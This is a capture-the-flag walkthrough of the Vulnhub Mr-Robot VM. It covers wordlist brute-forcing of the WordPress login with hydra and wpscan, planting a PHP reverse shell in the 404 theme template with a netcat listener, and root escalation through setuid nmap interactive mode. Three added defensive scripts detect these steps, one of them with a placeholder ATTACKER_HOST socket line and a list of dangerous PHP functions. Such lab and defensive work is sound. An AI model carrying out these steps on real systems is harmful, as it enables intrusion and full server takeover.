Vulnhub: Mr-Robot 1

This OS has three keys to capture; the uploader states that this is a basic vulnerability with no advanced exploitation. Let's dive right into this OS:

nmap 10.0.2.0/24 -A -Pn

This command found the Mr-Robot VM at 10.0.2.4 and found ports :80 and :443. The next course of action is to open up a web browser and see what port 80 shows me.

The page opened up with a beautiful intro.

The fancy page had nothing of interest, so I then took a look at 10.0.2.4/robots.txt.

So there is our first key:

wget 10.0.2.4/key-1-of-3.txt

I also downloaded what appears to be a dictionary file:

wget 10.0.2.4/fsocity.dic

Reading the first key gives us: 073403c8a58a1f80d943455fb30724b9. This appears to be an MD5 hash, but after using an online de-hashing tool I was unable to un-hash it.

The dictionary file contains a slew of words in a dictionary format. Some of these words are weird and specific, but they don't give any clues.

The next tool in my arsenal was a Nikto scan:

nikto -h 10.0.2.4

This scan indicated that this website is hosting WordPress content, and also that Nikto is indicating a PHP vulnerability... more on this further on. I did notice that there was a login page for WordPress:

10.0.2.4/wp-login

Realizing that this VM is based on the TV show, I gathered a list of character names from the show's IMDb page for the username. First was Elliot; I received this very specific login error when I typed "password" in the password field.

I then realized that we had downloaded a dictionary file alongside our first key. I then used hydra to proceed to brute-force our way in:

hydra -l elliot -P ~/fsocity.dic 10.0.2.4 http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR"

This attempt didn't work for me, so I gave up on the hydra route and decided to use the wpscan tool:

wpscan -u 10.0.2.4 --wordlist ~/fsocity.dic --username elliot

After only about 4 hours I was able to get the password for elliot: ER28-0652.
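The brute-force phase above leaves a very loud trace on the target. As an added example (not part of the original write-up), the script below shows what the defender's side of that attack looks like: it parses combined-format web server log lines and flags any client that sends a burst of POST requests to /wp-login.php. WordPress answers a failed login with HTTP 200 (the form re-renders with an error) and a successful one with a 302 redirect, so a long run of 200s ending in a 302 is exactly the signature of a wordlist attack that eventually found the password. The log lines, client addresses and timestamps are constructed for the example; the threshold and window are assumptions to tune per site.

```python
"""Detect WordPress login brute-forcing from web server access logs.

Added example, not code from the original write-up. Parses Apache/nginx
combined-format lines and flags any client IP that sends at least THRESHOLD
POSTs to /wp-login.php inside any sliding window of WINDOW seconds.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip - user [time] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: 10.0.2.15 hammers the login form and finally gets a
# 302 (success); 10.0.2.20 is an ordinary visitor who logs in once.
SAMPLE_LOG = """\
10.0.2.15 - - [10/Oct/2019:13:55:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2019:13:55:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2019:13:55:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.2.20 - - [10/Oct/2019:13:55:04 +0000] "GET /robots.txt HTTP/1.1" 200 41 "-" "Wget/1.20"
10.0.2.15 - - [10/Oct/2019:13:55:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2019:13:55:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2019:13:55:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.2.20 - - [10/Oct/2019:14:10:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return (ip, datetime, method, path, status) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), TIME_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def detect_login_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"attempts": n, "success": bool}} for every client whose
    POSTs to wp-login.php reach `threshold` inside some `window`-long span.
    "success" is True when at least one of that client's POSTs got a 302."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            events[ip].append((ts, status))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start, peak = 0, 0
        for end in range(len(evs)):
            # shrink the window from the left until it spans <= `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = {
                "attempts": len(evs),
                "success": any(st == 302 for _, st in evs),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['attempts']} login POSTs, credential accepted={info['success']}")
```

On a real server the same logic feeds a fail2ban-style block or an alert; a 302 after a burst of 200s should be treated as a confirmed account compromise, not just a noisy client.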

Now I'm in the WordPress admin panel, and this is where I can say that I'm an amateur at this point. After looking around for some faults I remembered that the Nikto scan showed some PHP vulnerabilities. After doing extensive research I found a PHP reverse shell in Kali, located at /usr/share/webshells/php/php-reverse-shell.php. Opening this file in a text editor I edited what was needed.

Editing the IP to Kali's IP and using any port, I copied the whole code and moved over to the admin panel in WordPress.

I went over to Appearance -> Editor, selected the 404 page and pasted my PHP shell code.

I applied my change, then proceeded to open a new terminal and start listening on port 1234:

nc -lvp 1234

I then went to 10.0.2.4/404, and sure enough this PHP reverse shell code worked.
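The step above works because the WordPress theme editor lets an administrator write arbitrary PHP into a template that the web server will later execute. As an added example (not part of the original write-up), the script below is the check a defender would run against that: it takes a SHA-256 baseline of every .php file in a theme directory, re-hashes later to report modified or newly dropped files, and scans any changed file for socket and process functions that a 404 template never legitimately calls. The theme tree here is constructed in a temporary directory, and the "tampered" 404.php only contains a single placeholder fsockopen() reference so the scanner has something to flag; it is not a working shell.

```python
"""Detect theme-file modification through the WordPress editor.

Added example, not code from the original write-up or from WordPress.
hash_tree() builds a baseline, diff_baseline() reports drift, and
suspicious_calls() greps a changed file for PHP primitives a reverse
shell needs. run_demo() exercises all three on a constructed theme.
"""
import hashlib
import os
import re
import tempfile

# PHP functions that a template file has no business calling.
SUSPICIOUS_CALLS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|exec|system|passthru|eval)\s*\(",
    re.IGNORECASE,
)


def hash_tree(root):
    """Map relative path -> sha256 hex digest for every .php file under root."""
    digest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digest


def diff_baseline(baseline, current):
    """Return (modified, added, removed) as sorted lists of relative paths."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def suspicious_calls(path):
    """Return the sorted list of dangerous PHP function names found in a file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return sorted({m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(fh.read())})


def run_demo():
    """Build a constructed theme, baseline it, simulate editor tampering, re-check."""
    with tempfile.TemporaryDirectory() as theme:
        files = {  # constructed, minimal stand-ins for real theme files
            "404.php": "<?php get_header(); ?><h1>Not found</h1><?php get_footer(); ?>\n",
            "index.php": "<?php get_header(); the_content(); get_footer(); ?>\n",
            "style.css": "/* not php, ignored by the hasher */\n",
        }
        for name, body in files.items():
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(body)
        baseline = hash_tree(theme)

        # Simulated tampering: a placeholder socket call appended to 404.php
        # (ATTACKER_HOST is a dummy value) and a new file dropped beside it.
        with open(os.path.join(theme, "404.php"), "a") as fh:
            fh.write("<?php $s = fsockopen('ATTACKER_HOST', 1234); ?>\n")
        with open(os.path.join(theme, "dropped.php"), "w") as fh:
            fh.write("<?php echo 'new file'; ?>\n")

        modified, added, removed = diff_baseline(baseline, hash_tree(theme))
        findings = {p: suspicious_calls(os.path.join(theme, p)) for p in modified + added}
        return modified, added, removed, findings


if __name__ == "__main__":
    modified, added, removed, findings = run_demo()
    print("modified:", modified, "added:", added, "removed:", removed)
    for path, calls in findings.items():
        print(f"{path}: {'suspicious ' + ', '.join(calls) if calls else 'no dangerous calls'}")
```

The cleaner fix is to take the editor away entirely: `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes Appearance -> Editor, so a stolen admin password no longer converts directly into code execution on the web server.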

I then looked around the directories and found that the /root folder is not accessible from here, so I then went to the /home/robot folder and found two files.

The .txt file cannot be viewed using the cat command in this shell, but the md5 file could be catted, and it read:

robot:c3fcd3d76192e4007dfb496cca67e13b

This appears to be a username and a hashed password. I then googled an MD5 decrypter and was given this password:

The only thing to do now is to log in to the VM itself:


Adding this code gives me a better shell that is familiar to me:

python -c "import pty; pty.spawn('/bin/bash');"

In the VM we are able to cat the second file that I was unable to in the PHP shell:


After getting the second key I was at a loss on how to get the third key. I was unable to get into /root because the user robot doesn't have root privileges. After reading numerous posts I came across this other walkthrough that this user did here. This person shows us that by launching nmap in interactive mode and then escaping the nmap prompt, you leave it without losing root privileges.


I then gained access to the /root directory and was able to get the last key:

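The nmap trick above only works because the binary is installed setuid root, so auditing for that class of misconfiguration is the hardening step that closes it. As an added example (not part of the original write-up), the script below is a small setuid-root audit: classify_file() is a pure function over stat data so it can be tested with constructed values, and find_suid_root() walks the usual binary directories and reports every setuid-root regular file. The RISKY_NAMES set is a placeholder containing only nmap, the binary this VM used; the directory list is an assumption to adjust for the system being audited.

```python
"""Audit setuid-root binaries, the misconfiguration behind the nmap escalation.

Added example, not code from the original write-up. Any setuid-root binary
that can spawn a shell or read arbitrary files is a privilege-escalation
path; the fix is `chmod u-s` on the binary (or removing it) unless it is
genuinely needed.
"""
import os
import stat

# Placeholder list of binaries known to hand out a shell when setuid root.
# Only nmap (the one this VM used) is listed; extend from your own baseline.
RISKY_NAMES = {"nmap"}

DEFAULT_ROOTS = ("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin")


def classify_file(path, mode, uid):
    """Return None if not a setuid-root regular file, otherwise
    'known-risky' (basename in RISKY_NAMES) or 'review'."""
    if not stat.S_ISREG(mode):
        return None
    if not (mode & stat.S_ISUID) or uid != 0:
        return None
    return "known-risky" if os.path.basename(path) in RISKY_NAMES else "review"


def find_suid_root(roots=DEFAULT_ROOTS):
    """Walk `roots` and return {path: verdict} for every setuid-root file."""
    findings = {}
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                full = os.path.join(dirpath, name)
                try:
                    st = os.lstat(full)  # lstat: do not follow symlinks
                except OSError:
                    continue
                verdict = classify_file(full, st.st_mode, st.st_uid)
                if verdict is not None:
                    findings[full] = verdict
    return findings


if __name__ == "__main__":
    results = find_suid_root()
    for path, verdict in sorted(results.items()):
        print(f"{verdict:12} {path}")
    print(f"{len(results)} setuid-root files; "
          f"{sum(v == 'known-risky' for v in results.values())} known-risky")
```

Run it as part of a periodic baseline comparison: a setuid-root file that appears between two runs, or one whose verdict is known-risky, is worth an immediate look regardless of which user installed it.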

So what did I learn after doing this VM? Well, I learned the usefulness of a PHP reverse shell and how to properly use it. I also learned about gaining privileges through a terminal, and using a vulnerability to gain these privileges. When all is said and done I had a wonderful time working on this VM; thank you to the author of the VM who posted it on vulnhub.com.

References:

Gaining Privileges

Nmap Privilege